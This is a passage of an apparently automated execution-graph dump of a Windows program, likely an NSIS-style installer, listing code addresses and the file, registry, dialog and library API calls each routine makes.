                                                                                              execution_graph 4201 402fc0 4202 401446 18 API calls 4201->4202 4203 402fc7 4202->4203 4204 401a13 4203->4204 4205 403017 4203->4205 4206 40300a 4203->4206 4208 406831 18 API calls 4205->4208 4207 401446 18 API calls 4206->4207 4207->4204 4208->4204 4209 4023c1 4210 40145c 18 API calls 4209->4210 4211 4023c8 4210->4211 4214 407296 4211->4214 4217 406efe CreateFileW 4214->4217 4218 406f30 4217->4218 4219 406f4a ReadFile 4217->4219 4220 4062cf 11 API calls 4218->4220 4221 4023d6 4219->4221 4224 406fb0 4219->4224 4220->4221 4222 406fc7 ReadFile lstrcpynA lstrcmpA 4222->4224 4225 40700e SetFilePointer ReadFile 4222->4225 4223 40720f CloseHandle 4223->4221 4224->4221 4224->4222 4224->4223 4226 407009 4224->4226 4225->4223 4227 4070d4 ReadFile 4225->4227 4226->4223 4228 407164 4227->4228 4228->4226 4228->4227 4229 40718b SetFilePointer GlobalAlloc ReadFile 4228->4229 4230 4071eb lstrcpynW GlobalFree 4229->4230 4231 4071cf 4229->4231 4230->4223 4231->4230 4231->4231 4232 401cc3 4233 40145c 18 API calls 4232->4233 4234 401cca lstrlenW 4233->4234 4235 4030dc 4234->4235 4236 4030e3 4235->4236 4238 405f7d wsprintfW 4235->4238 4238->4236 4239 401c46 4240 40145c 18 API calls 4239->4240 4241 401c4c 4240->4241 4242 4062cf 11 API calls 4241->4242 4243 401c59 4242->4243 4244 406cc7 81 API calls 4243->4244 4245 401c64 4244->4245 4246 403049 4247 401446 18 API calls 4246->4247 4248 403050 4247->4248 4249 406831 18 API calls 4248->4249 4250 401a13 4248->4250 4249->4250 4251 40204a 4252 401446 18 API calls 4251->4252 4253 402051 IsWindow 4252->4253 4254 4018d3 4253->4254 4255 40324c 4256 403277 4255->4256 4257 40325e SetTimer 4255->4257 4258 4032cc 4256->4258 4259 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4256->4259 4257->4256 4259->4258 4260 4022cc 4261 40145c 18 API calls 4260->4261 4262 4022d3 4261->4262 4263 406301 2 API calls 4262->4263 4264 4022d9 4263->4264 4266 4022e8 4264->4266 4269 405f7d wsprintfW 4264->4269 4267 4030e3 4266->4267 4270 405f7d wsprintfW 4266->4270 4269->4266 4270->4267 4271 4030cf 4272 40145c 18 API calls 4271->4272 4273 4030d6 4272->4273 4275 4030dc 4273->4275 4278 4063d8 GlobalAlloc lstrlenW 4273->4278 4276 4030e3 4275->4276 4305 405f7d wsprintfW 4275->4305 4279 406460 4278->4279 4280 40640e 4278->4280 4279->4275 4281 40643b GetVersionExW 4280->4281 4306 406057 CharUpperW 4280->4306 4281->4279 4282 40646a 4281->4282 4283 406490 LoadLibraryA 4282->4283 4284 406479 4282->4284 4283->4279 4287 4064ae GetProcAddress GetProcAddress GetProcAddress 4283->4287 4284->4279 4286 4065b1 GlobalFree 4284->4286 4288 4065c7 LoadLibraryA 4286->4288 4289 406709 FreeLibrary 4286->4289 4290 406621 4287->4290 4294 4064d6 4287->4294 4288->4279 4292 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4288->4292 4289->4279 4291 40667d FreeLibrary 4290->4291 4293 406656 4290->4293 4291->4293 4292->4290 4297 406716 4293->4297 4302 4066b1 lstrcmpW 4293->4302 4303 4066e2 CloseHandle 4293->4303 4304 406700 CloseHandle 4293->4304 4294->4290 4295 406516 4294->4295 4296 4064fa FreeLibrary GlobalFree 4294->4296 4295->4286 4298 406528 lstrcpyW OpenProcess 4295->4298 4300 40657b CloseHandle CharUpperW lstrcmpW 4295->4300 4296->4279 4299 40671b CloseHandle FreeLibrary 4297->4299 4298->4295 4298->4300 4301 406730 CloseHandle 4299->4301 4300->4290 4300->4295 4301->4299 4302->4293 4302->4301 4303->4293 4304->4289 4305->4276 4306->4280 4307 4044d1 4308 40450b 4307->4308 4309 40453e 4307->4309 4375 405cb0 GetDlgItemTextW 4308->4375 4310 40454b GetDlgItem GetAsyncKeyState 4309->4310 4314 4045dd 4309->4314 4312 40456a GetDlgItem 4310->4312 4325 404588 4310->4325 4317 403d6b 19 API calls 4312->4317 4313 4046c9 4373 40485f 4313->4373 4377 405cb0 GetDlgItemTextW 4313->4377 4314->4313 4322 406831 18 API calls 4314->4322 4314->4373 4315 404516 4316 406064 5 API calls 4315->4316 4318 40451c 4316->4318 4320 40457d ShowWindow 4317->4320 4321 403ea0 5 API calls 4318->4321 4320->4325 4326 404521 GetDlgItem 4321->4326 4327 40465b SHBrowseForFolderW 4322->4327 4323 4046f5 4328 4067aa 18 API calls 4323->4328 4324 403df6 8 API calls 4329 404873 4324->4329 4330 4045a5 SetWindowTextW 4325->4330 4334 405d85 4 API calls 4325->4334 4331 40452f IsDlgButtonChecked 4326->4331 4326->4373 4327->4313 4333 404673 CoTaskMemFree 4327->4333 4338 4046fb 4328->4338 4332 403d6b 19 API calls 4330->4332 4331->4309 4336 4045c3 4332->4336 4337 40674e 3 API calls 4333->4337 4335 40459b 4334->4335 4335->4330 4342 40674e 3 API calls 4335->4342 4339 403d6b 19 API calls 4336->4339 4340 404680 4337->4340 4378 406035 lstrcpynW 4338->4378 4343 4045ce 4339->4343 4344 4046b7 SetDlgItemTextW 4340->4344 4349 406831 18 API calls 4340->4349 4342->4330 4376 403dc4 SendMessageW 4343->4376 4344->4313 4345 404712 4347 406328 3 API calls 4345->4347 4356 40471a 4347->4356 4348 4045d6 4350 406328 3 API calls 4348->4350 4351 40469f lstrcmpiW 4349->4351 4350->4314 4351->4344 4354 4046b0 lstrcatW 4351->4354 4352 40475c 4379 406035 lstrcpynW 4352->4379 4354->4344 4355 404765 4357 405d85 4 API calls 4355->4357 4356->4352 4360 40677d 2 API calls 4356->4360 4362 4047b1 4356->4362 4358 40476b GetDiskFreeSpaceW 4357->4358 4361 40478f MulDiv 4358->4361 4358->4362 4360->4356 4361->4362 4363 40480e 4362->4363 4380 4043d9 4362->4380 4364 404831 4363->4364 4366 40141d 80 API calls 4363->4366 4388 403db1 KiUserCallbackDispatcher 4364->4388 4366->4364 4367 4047ff 4369 404810 SetDlgItemTextW 4367->4369 4370 404804 4367->4370 4369->4363 4372 4043d9 21 API calls 4370->4372 4371 40484d 4371->4373 4389 403d8d 4371->4389 4372->4363 4373->4324 4375->4315 4376->4348 4377->4323 4378->4345 4379->4355 4381 4043f9 4380->4381 4382 406831 18 API calls 4381->4382 4383 404439 4382->4383 4384 406831 18 API calls 4383->4384 4385 404444 4384->4385 4386 406831 18 API calls 4385->4386 4387 404454 lstrlenW wsprintfW SetDlgItemTextW 4386->4387 4387->4367 4388->4371 4390 403da0 SendMessageW 4389->4390 4391 403d9b 4389->4391 4390->4373 4391->4390 4392 401dd3 4393 401446 18 API calls 4392->4393 4394 401dda 4393->4394 4395 401446 18 API calls 4394->4395 4396 4018d3 4395->4396 4397 402e55 4398 40145c 18 API calls 4397->4398 4399 402e63 4398->4399 4400 402e79 4399->4400 4401 40145c 18 API calls 4399->4401 4402 405e5c 2 API calls 4400->4402 4401->4400 4403 402e7f 4402->4403 4427 405e7c GetFileAttributesW CreateFileW 4403->4427 4405 402e8c 4406 402f35 4405->4406 4407 402e98 GlobalAlloc 4405->4407 4410 4062cf 11 API calls 4406->4410 4408 402eb1 4407->4408 4409 402f2c CloseHandle 4407->4409 4428 403368 SetFilePointer 4408->4428 4409->4406 4412 402f45 4410->4412 4414 402f50 DeleteFileW 4412->4414 4415 402f63 4412->4415 4413 402eb7 4416 403336 ReadFile 4413->4416 4414->4415 4429 401435 4415->4429 4418 402ec0 GlobalAlloc 4416->4418 4419 402ed0 4418->4419 4420 402f04 WriteFile GlobalFree 4418->4420 4422 40337f 33 API calls 4419->4422 4421 40337f 33 API calls 4420->4421 4423 402f29 4421->4423 4426 402edd 4422->4426 4423->4409 4425 402efb GlobalFree 4425->4420 4426->4425 4427->4405 4428->4413 4430 404f9e 25 API calls 4429->4430 4431 401443 4430->4431 4432 401cd5 4433 401446 18 API calls 4432->4433 4434 401cdd 4433->4434 4435 401446 18 API calls 4434->4435 4436 401ce8 4435->4436 4437 40145c 18 API calls 4436->4437 4438 401cf1 4437->4438 4439 401d07 lstrlenW 4438->4439 4440 401d43 4438->4440 4441 401d11 4439->4441 4441->4440 4445 406035 lstrcpynW 4441->4445 4443 401d2c 4443->4440 4444 401d39 lstrlenW 4443->4444 4444->4440 4445->4443 4446 402cd7 4447 401446 18 API calls 4446->4447 4449 402c64 4447->4449 4448 402d17 ReadFile 4448->4449 4449->4446 4449->4448 4450 402d99 4449->4450 4451 402dd8 4452 4030e3 4451->4452 4453 402ddf 4451->4453 4454 402de5 FindClose 4453->4454 4454->4452 4455 401d5c 4456 40145c 18 API calls 4455->4456 4457 401d63 4456->4457 4458 40145c 18 API calls 4457->4458 4459 401d6c 4458->4459 4460 401d73 lstrcmpiW 4459->4460 4461 401d86 lstrcmpW 4459->4461 4462 401d79 4460->4462 4461->4462 4463 401c99 4461->4463 4462->4461 4462->4463 4464 4027e3 4465 4027e9 4464->4465 4466 4027f2 4465->4466 4467 402836 4465->4467 4480 401553 4466->4480 4468 40145c 18 API calls 4467->4468 4470 40283d 4468->4470 4472 4062cf 11 API calls 4470->4472 4471 4027f9 4473 40145c 18 API calls 4471->4473 4477 401a13 4471->4477 4474 40284d 4472->4474 4475 40280a RegDeleteValueW 4473->4475 4484 40149d RegOpenKeyExW 4474->4484 4476 4062cf 11 API calls 4475->4476 4479 40282a RegCloseKey 4476->4479 4479->4477 4481 401563 4480->4481 4482 40145c 18 API calls 4481->4482 4483 401589 RegOpenKeyExW 4482->4483 4483->4471 4487 4014c9 4484->4487 4492 401515 4484->4492 4485 4014ef RegEnumKeyW 4486 401501 RegCloseKey 4485->4486 4485->4487 4489 406328 3 API calls 4486->4489 4487->4485 4487->4486 4488 401526 RegCloseKey 4487->4488 4490 40149d 3 API calls 4487->4490 4488->4492 4491 401511 4489->4491 4490->4487 4491->4492 4493 401541 RegDeleteKeyW 4491->4493 4492->4477 4493->4492 4494 4040e4 4495 4040ff 4494->4495 4501 40422d 4494->4501 4497 40413a 4495->4497 4525 403ff6 WideCharToMultiByte 4495->4525 4496 404298 4498 40436a 4496->4498 4499 4042a2 GetDlgItem 4496->4499 4505 403d6b 19 API calls 4497->4505 4506 403df6 8 API calls 4498->4506 4502 40432b 4499->4502 4503 4042bc 4499->4503 4501->4496 4501->4498 4504 404267 GetDlgItem SendMessageW 4501->4504 4502->4498 4507 40433d 4502->4507 4503->4502 4511 4042e2 6 API calls 4503->4511 4530 403db1 KiUserCallbackDispatcher 4504->4530 4509 40417a 4505->4509 4510 404365 4506->4510 4512 404353 4507->4512 4513 404343 SendMessageW 4507->4513 4515 403d6b 19 API calls 4509->4515 4511->4502 4512->4510 4516 404359 SendMessageW 4512->4516 4513->4512 4514 404293 4517 403d8d SendMessageW 4514->4517 4518 404187 CheckDlgButton 4515->4518 4516->4510 4517->4496 4528 403db1 KiUserCallbackDispatcher 4518->4528 4520 4041a5 GetDlgItem 4529 403dc4 SendMessageW 4520->4529 4522 4041bb SendMessageW 4523 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4522->4523 4524 4041d8 GetSysColor 4522->4524 4523->4510 4524->4523 4526 404033 4525->4526 4527 404015 GlobalAlloc WideCharToMultiByte 4525->4527 4526->4497 4527->4526 4528->4520 4529->4522 4530->4514 4531 402ae4 4532 402aeb 4531->4532 4533 4030e3 4531->4533 4534 402af2 CloseHandle 4532->4534 4534->4533 4535 402065 4536 401446 18 API calls 4535->4536 4537 40206d 4536->4537 4538 401446 18 API calls 4537->4538 4539 402076 GetDlgItem 4538->4539 4540 4030dc 4539->4540 4541 4030e3 4540->4541 4543 405f7d wsprintfW 4540->4543 4543->4541 4544 402665 4545 40145c 18 API calls 4544->4545 4546 40266b 4545->4546 4547 40145c 18 API calls 4546->4547 4548 402674 4547->4548 4549 40145c 18 API calls 4548->4549 4550 40267d 4549->4550 4551 4062cf 11 API calls 4550->4551 4552 40268c 4551->4552 4553 406301 2 API calls 4552->4553 4554 402695 4553->4554 4555 4026a6 lstrlenW lstrlenW 4554->4555 4557 404f9e 25 API calls 4554->4557 4559 4030e3 4554->4559 4556 404f9e 25 API calls 4555->4556 4558 4026e8 SHFileOperationW 4556->4558 4557->4554 4558->4554 4558->4559 4560 401c69 4561 40145c 18 API calls 4560->4561 4562 401c70 4561->4562 4563 4062cf 11 API calls 4562->4563 4564 401c80 4563->4564 4565 405ccc MessageBoxIndirectW 4564->4565 4566 401a13 4565->4566 4567 402f6e 4568 402f72 4567->4568 4569 402fae 4567->4569 4571 4062cf 11 API calls 4568->4571 4570 40145c 18 API calls 4569->4570 4577 402f9d 4570->4577 4572 402f7d 4571->4572 4573 4062cf 11 API calls 4572->4573 4574 402f90 4573->4574 4575 402fa2 4574->4575 4576 402f98 4574->4576 4579 406113 9 API calls 4575->4579 4578 403ea0 5 API calls 4576->4578 4578->4577 4579->4577 4580 4023f0 4581 402403 4580->4581 4582 4024da 4580->4582 4583 40145c 18 API calls 4581->4583 4584 404f9e 25 API calls 4582->4584 4585 40240a 4583->4585 4588 4024f1 4584->4588 4586 40145c 18 API calls 4585->4586 4587 402413 4586->4587 4589 402429 LoadLibraryExW 4587->4589 4590 40241b GetModuleHandleW 4587->4590 4591 4024ce 4589->4591 4592 40243e 4589->4592 4590->4589 4590->4592 4594 404f9e 25 API calls 4591->4594 4604 406391 GlobalAlloc WideCharToMultiByte 4592->4604 4594->4582 4595 402449 4596 40248c 4595->4596 4597 40244f 4595->4597 4598 404f9e 25 API calls 4596->4598 4599 401435 25 API calls 4597->4599 4602 40245f 4597->4602 4600 402496 4598->4600 4599->4602 4601 4062cf 11 API calls 4600->4601 4601->4602 4602->4588 4603 4024c0 FreeLibrary 4602->4603 4603->4588 4605 4063c9 GlobalFree 4604->4605 4606 4063bc GetProcAddress 4604->4606 4605->4595 4606->4605 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4607 4048f8 4608 404906 4607->4608 4609 40491d 4607->4609 4610 40490c 4608->4610 4625 404986 4608->4625 4611 40492b IsWindowVisible 4609->4611 4617 404942 4609->4617 4612 403ddb SendMessageW 4610->4612 4614 404938 4611->4614 4611->4625 4615 404916 4612->4615 4613 40498c CallWindowProcW 4613->4615 4626 40487a SendMessageW 4614->4626 4617->4613 4631 406035 lstrcpynW 4617->4631 4619 404971 4632 405f7d wsprintfW 4619->4632 4621 404978 4622 40141d 80 API calls 4621->4622 4623 40497f 4622->4623 4633 406035 lstrcpynW 4623->4633 4625->4613 4627 4048d7 SendMessageW 4626->4627 4628 40489d GetMessagePos ScreenToClient SendMessageW 4626->4628 4630 4048cf 4627->4630 4629 4048d4 4628->4629 4628->4630 4629->4627 4630->4617 4631->4619 4632->4621 4633->4625 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4634 4020f9 GetDC GetDeviceCaps 4635 401446 18 API calls 4634->4635 4636 402116 MulDiv 4635->4636 4637 401446 18 API calls 4636->4637 4638 40212c 4637->4638 4639 406831 18 API calls 4638->4639 4640 402165 CreateFontIndirectW 4639->4640 4641 4030dc 4640->4641 4642 4030e3 4641->4642 4644 405f7d wsprintfW 4641->4644 4644->4642 4645 4024fb 4646 40145c 18 API calls 4645->4646 4647 402502 4646->4647 4648 40145c 18 API calls 4647->4648 4649 40250c 4648->4649 4650 40145c 18 API calls 4649->4650 4651 402515 4650->4651 4652 40145c 18 API calls 4651->4652 4653 40251f 4652->4653 4654 40145c 18 API calls 4653->4654 4655 402529 4654->4655 4656 40253d 4655->4656 4657 40145c 18 API calls 4655->4657 4658 4062cf 11 API calls 4656->4658 4657->4656 4659 40256a CoCreateInstance 4658->4659 4660 40258c 4659->4660 4661 4026fc 4663 402708 4661->4663 4664 401ee4 4661->4664 4662 406831 18 API calls 4662->4664 4664->4661 4664->4662 3808 4019fd 3809 40145c 18 API calls 3808->3809 3810 401a04 3809->3810 3813 405eab 3810->3813 3814 405eb8 GetTickCount GetTempFileNameW 3813->3814 3815 401a0b 3814->3815 3816 405eee 3814->3816 3816->3814 3816->3815 4665 4022fd 4666 40145c 18 API calls 4665->4666 4667 402304 GetFileVersionInfoSizeW 4666->4667 4668 4030e3 4667->4668 4669 40232b GlobalAlloc 4667->4669 4669->4668 4670 40233f GetFileVersionInfoW 4669->4670 4671 402350 VerQueryValueW 4670->4671 4672 402381 GlobalFree 4670->4672 4671->4672 4673 402369 4671->4673 4672->4668 4678 405f7d wsprintfW 4673->4678 4676 402375 4679 405f7d wsprintfW 4676->4679 4678->4676 4679->4672 4680 402afd 4681 40145c 18 API calls 4680->4681 4682 402b04 4681->4682 4687 405e7c GetFileAttributesW CreateFileW 4682->4687 4684 402b10 4685 4030e3 4684->4685 4688 405f7d wsprintfW 4684->4688 4687->4684 4688->4685 4689 4029ff 4690 401553 19 API calls 4689->4690 4691 402a09 4690->4691 4692 40145c 18 API calls 4691->4692 4693 402a12 4692->4693 4694 402a1f RegQueryValueExW 4693->4694 4698 401a13 4693->4698 4695 402a45 4694->4695 4696 402a3f 4694->4696 4697 4029e4 RegCloseKey 4695->4697 4695->4698 4696->4695 4700 405f7d wsprintfW 4696->4700 4697->4698 4700->4695 4701 401000 4702 401037 BeginPaint GetClientRect 4701->4702 4703 40100c DefWindowProcW 4701->4703 4705 4010fc 4702->4705 4706 401182 4703->4706 4707 401073 CreateBrushIndirect FillRect DeleteObject 4705->4707 4708 401105 4705->4708 4707->4705 4709 401170 EndPaint 4708->4709 4710 40110b CreateFontIndirectW 4708->4710 4709->4706 4710->4709 4711 40111b 6 API calls 4710->4711 4711->4709 4712 401f80 4713 401446 18 API calls 4712->4713 4714 401f88 4713->4714 4715 401446 18 API calls 4714->4715 4716 401f93 4715->4716 4717 401fa3 4716->4717 4718 40145c 18 API calls 4716->4718 4719 401fb3 4717->4719 4720 40145c 18 API calls 4717->4720 4718->4717 4721 402006 4719->4721 4722 401fbc 4719->4722 4720->4719 4723 40145c 18 API calls 4721->4723 4724 401446 18 API calls 4722->4724 4725 40200d 4723->4725 4726 401fc4 4724->4726 4728 40145c 18 API calls 4725->4728 4727 401446 18 API calls 4726->4727 4729 401fce 4727->4729 4730 402016 FindWindowExW 4728->4730 4731 401ff6 SendMessageW 4729->4731 4732 401fd8 SendMessageTimeoutW 4729->4732 4734 402036 4730->4734 4731->4734 4732->4734 4733 4030e3 4734->4733 4736 405f7d wsprintfW 4734->4736 4736->4733 4737 402880 4738 402884 4737->4738 4739 40145c 18 API calls 4738->4739 4740 4028a7 4739->4740 4741 40145c 18 API calls 4740->4741 4742 4028b1 4741->4742 4743 4028ba RegCreateKeyExW 4742->4743 4744 4028e8 4743->4744 4749 4029ef 4743->4749 4745 402934 4744->4745 4747 40145c 18 API calls 4744->4747 4746 402963 4745->4746 4748 401446 18 API calls 4745->4748 4750 4029ae RegSetValueExW 4746->4750 4753 40337f 33 API calls 4746->4753 4751 4028fc lstrlenW 4747->4751 4752 402947 4748->4752 4756 4029c6 RegCloseKey 4750->4756 4757 4029cb 4750->4757 4754 402918 4751->4754 4755 40292a 4751->4755 4759 4062cf 11 API calls 4752->4759 4760 40297b 4753->4760 4761 4062cf 11 API calls 4754->4761 4762 4062cf 11 API calls 4755->4762 4756->4749 4758 4062cf 11 API calls 4757->4758 4758->4756 4759->4746 4768 406250 4760->4768 4765 402922 4761->4765 4762->4745 4765->4750 4767 4062cf 11 API calls 4767->4765 4769 406273 4768->4769 4770 4062b6 4769->4770 4771 406288 wsprintfW 4769->4771 4772 402991 4770->4772 4773 4062bf lstrcatW 4770->4773 4771->4770 4771->4771 4772->4767 4773->4772 4774 403d02 4775 403d0d 4774->4775 4776 403d11 4775->4776 4777 403d14 GlobalAlloc 4775->4777 4777->4776 4778 402082 4779 401446 18 API calls 4778->4779 4780 402093 SetWindowLongW 4779->4780 4781 4030e3 4780->4781 4782 402a84 4783 401553 19 API calls 4782->4783 4784 402a8e 4783->4784 4785 401446 18 API calls 4784->4785 4786 402a98 4785->4786 4787 401a13 4786->4787 4788 402ab2 RegEnumKeyW 4786->4788 4789 402abe RegEnumValueW 4786->4789 4790 402a7e 4788->4790 4789->4787 4789->4790 4790->4787 4791 4029e4 RegCloseKey 4790->4791 4791->4787 4792 402c8a 4793 402ca2 4792->4793 4794 402c8f 4792->4794 4796 40145c 18 API calls 4793->4796 4795 401446 18 API calls 4794->4795 4798 402c97 4795->4798 4797 402ca9 lstrlenW 4796->4797 4797->4798 4799 401a13 4798->4799 4800 402ccb WriteFile 4798->4800 4800->4799 4801 401d8e 4802 40145c 18 API calls 4801->4802 4803 401d95 ExpandEnvironmentStringsW 4802->4803 4804 401da8 4803->4804 4805 401db9 4803->4805 4804->4805 4806 401dad lstrcmpW 4804->4806 4806->4805 4807 401e0f 4808 401446 18 API calls 4807->4808 4809 401e17 4808->4809 4810 401446 18 API calls 4809->4810 4811 401e21 4810->4811 4812 4030e3 4811->4812 4814 405f7d wsprintfW 4811->4814 4814->4812 4815 40438f 4816 4043c8 4815->4816 4817 40439f 4815->4817 4818 403df6 8 API calls 4816->4818 4819 403d6b 19 API calls 4817->4819 4821 4043d4 4818->4821 4820 4043ac SetDlgItemTextW 4819->4820 4820->4816 4822 403f90 4823 403fa0 4822->4823 4824 403fbc 4822->4824 4833 405cb0 GetDlgItemTextW 4823->4833 4826 403fc2 SHGetPathFromIDListW 4824->4826 4827 403fef 4824->4827 4829 403fd2 4826->4829 4832 403fd9 SendMessageW 4826->4832 4828 403fad SendMessageW 4828->4824 4830 40141d 80 API calls 4829->4830 4830->4832 4832->4827 4833->4828 4834 402392 4835 40145c 18 API calls 4834->4835 4836 402399 4835->4836 4839 407224 4836->4839 4840 406efe 25 API calls 4839->4840 4841 407244 4840->4841 4842 4023a7 4841->4842 4843 40724e lstrcpynW lstrcmpW 4841->4843 4844 407280 4843->4844 4845 407286 lstrcpynW 4843->4845 4844->4845 4845->4842 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4846 402797 4847 40145c 18 API calls 4846->4847 4848 4027ae 4847->4848 4849 40145c 18 API calls 4848->4849 4850 4027b7 4849->4850 4851 40145c 18 API calls 4850->4851 4852 4027c0 GetPrivateProfileStringW lstrcmpW 4851->4852 4853 401e9a 4854 40145c 18 API calls 4853->4854 4855 401ea1 4854->4855 4856 401446 18 API calls 4855->4856 4857 401eab wsprintfW 4856->4857 3817 401a1f 3818 40145c 18 API calls 3817->3818 3819 401a26 3818->3819 3820 4062cf 11 API calls 3819->3820 3821 401a49 3820->3821 3822 401a64 3821->3822 3823 401a5c 3821->3823 3892 406035 lstrcpynW 3822->3892 3891 406035 lstrcpynW 3823->3891 3826 401a6f 3893 40674e lstrlenW CharPrevW 3826->3893 3827 401a62 3830 406064 5 API calls 3827->3830 3861 401a81 3830->3861 3831 406301 2 API calls 3831->3861 3834 401a98 CompareFileTime 3834->3861 3835 401ba9 3836 404f9e 25 API calls 3835->3836 3838 401bb3 3836->3838 3837 401b5d 3839 404f9e 25 API calls 3837->3839 3870 40337f 3838->3870 3841 401b70 3839->3841 3845 4062cf 11 API calls 3841->3845 3843 406035 lstrcpynW 3843->3861 3844 4062cf 11 API calls 3846 401bda 3844->3846 3850 401b8b 3845->3850 3847 401be9 SetFileTime 3846->3847 3848 401bf8 CloseHandle 3846->3848 3847->3848 3848->3850 3851 401c09 3848->3851 3849 406831 18 API calls 3849->3861 3852 401c21 3851->3852 3853 401c0e 3851->3853 3854 406831 18 API calls 3852->3854 3855 406831 18 API calls 3853->3855 3856 401c29 3854->3856 3858 401c16 lstrcatW 3855->3858 3859 4062cf 11 API calls 3856->3859 3858->3856 3862 401c34 3859->3862 3860 401b50 3864 401b93 3860->3864 3865 401b53 3860->3865 3861->3831 3861->3834 3861->3835 3861->3837 3861->3843 3861->3849 3861->3860 3863 4062cf 11 API calls 3861->3863 3869 405e7c GetFileAttributesW CreateFileW 3861->3869 3896 405e5c GetFileAttributesW 3861->3896 3899 405ccc 3861->3899 3866 405ccc MessageBoxIndirectW 3862->3866 3863->3861 3867 4062cf 11 API calls 3864->3867 3868 4062cf 11 API calls 3865->3868 3866->3850 3867->3850 3868->3837 3869->3861 3871 40339a 3870->3871 3872 4033c7 3871->3872 3905 403368 SetFilePointer 3871->3905 3903 403336 ReadFile 3872->3903 3876 401bc6 3876->3844 3877 403546 3879 40354a 3877->3879 3880 40356e 3877->3880 3878 4033eb GetTickCount 3878->3876 3883 403438 3878->3883 3881 403336 ReadFile 3879->3881 3880->3876 3884 403336 ReadFile 3880->3884 3885 40358d 